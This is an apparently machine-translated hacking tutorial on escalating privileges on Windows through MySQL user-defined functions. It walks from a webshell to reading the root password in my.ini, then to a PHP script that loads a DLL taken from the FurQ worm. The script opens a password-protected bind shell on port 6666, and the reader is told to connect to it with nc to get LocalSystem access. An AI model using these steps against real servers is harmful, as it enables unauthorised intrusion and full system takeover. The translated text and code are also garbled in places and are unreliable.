Not long ago, a MySQL Func vulnerability was published on the Internet. It is about using MySQL to create a user-defined function and then using this function to attack the server. We first saw the related reports on the o-otik, but published the Exploit for Unix systems, and the success rate was not very high. recently, some experts in China have published articles about the Win system, so I am looking for a study with my friends.
  
In fact, we have long been able to think that when we attack the MSSQLOracle database, we get the account with the highest permissions in the database, and often execute special extension processes or functions to launch attacks. For example, if MSSQL has xp_mongoshell, Oracle can use Msvcrt. dll to create a special function. however, we never thought that MySQL, one of the popular database software, can also be used to create functions. from this point of view, this MySQL vulnerability should not be called a vulnerability but a technology.
  
After a bunch of nonsense, let's take a look at how to create a function in MySQL. this is much more important than how to use it. As long as you understand the principle, you can use it more flexibly and integrate it with other ideas.
  
The statement for creating a function in MySQL is:
  
Create Function FunctionName Returns [String | Integer | Real] Soname C: function. dll;
  
FunctionName refers to the Function name, C: Function. DLL refers to the DLL called by the function, and the function name is the function name in the DLL. however, we need to note that if we need MySQL to include a parameter in the function, it must comply with the UDF programming rules, for details, see section 14th "Add new functions for MySQL" in the MySQL manual. here, STRING, INTEGET, and REAL are the values returned after the function is executed. of course, we don't have to follow the UDF writing. In fact, if we use a code in our function that we want to execute, instead of using parameters, the attack can be achieved, for example, System ("command.com") and so on. the FurQ worm, which is currently attacked by this vulnerability on the Internet, is an example of not using the UDF format. however, note that the statement used to create a function must require that the MySQL account we use has the write permission on the mysql database; otherwise, it cannot be used normally.
  
Okay. After understanding the principles, let's take a look at how to use MySQL to improve permissions.
  
Here we have obtained a WebShell for the server through various vulnerabilities. Here we demonstrate angel phpspy, because PHP has a function connected to MySQL by default, ASP requires the use of additional components for connection.
  
In general, in the Windows system, many software will create a file named my. ini file, which contains sensitive MySQL information. if the host we conquer does not have good permission settings, we have the permission to browse the % windir % directory, so we can easily read the information. in addition, many administrators usually write the root account and password into this My. ini, so once we read the password of the root user, we can manipulate the entire MySQL database or server. 1.
  
After obtaining the MySQL Root Password, We need to upload our DLL file. Here I use the FurQ extracted from the FurQ worm. dll. execute this FurQ. in the DLL Shell function, the system will open a cipher Shell with a password on port 6666. Of course, the password is known as "FurQ. however, we have no execution conditions yet. you need to use MySQL to create this function in MySQL.
  
Now, we use PHPSPY to create a PHP file.
  
Enter the following content
  
  
  
$ Link = mysql_connect (127.0.0.1, root, root );
  
If (! $ Link ){
  
Die (cocould NOt Connect The Database! :. Mysql_error ());
  
};
  
Echo "Good Boy. Connected!
";
  
// Here, the rootoot is the user and password read from my. ini.
  
@ Mysql_select_db (mysql) or die (use database mysql failed !);
  
Echo "Yes You Did!
";
  
// Here, select the MySQL database table. Of course, you can also choose another one, such as test.
  
$ Query = "Create Function Shell returns integer soname d: \ wwwroot \ FurQ. dll ;";
  
@ $ Result = mysql_query ($ query, $ link) or die ("Create Function Failed! ");
  
Echo "Goddess... Successed!
";
  
// These two statements are the key. Execute the MySQL creation function statement and create the Shell function in d: wwwrootfurq. dll into MySQL so that MySQL can execute this Shell function.
  
$ Query = "Select Shell ();";
  
@ $ Result = mysql_query ($ query, $ link) or die ("Execute failed ");
  
Echo "Congratulations! Connect The Port 6666 Of This Server VS password: FurQ
";
  
// Execute the Shell function to open port 6666 of the server.
  
?>
  
Execute again, all returns normally. 2. now, we can use nc to connect to port 6666 of the server and enter the password: FurQ. then the response shell is returned .. of course, because it inherits the permissions of MySQL, MySQL is installed by service by default in Win system. That is to say, the Shell we get is the LocalSystem permission, and we can do whatever we want, but do not do anything bad. haha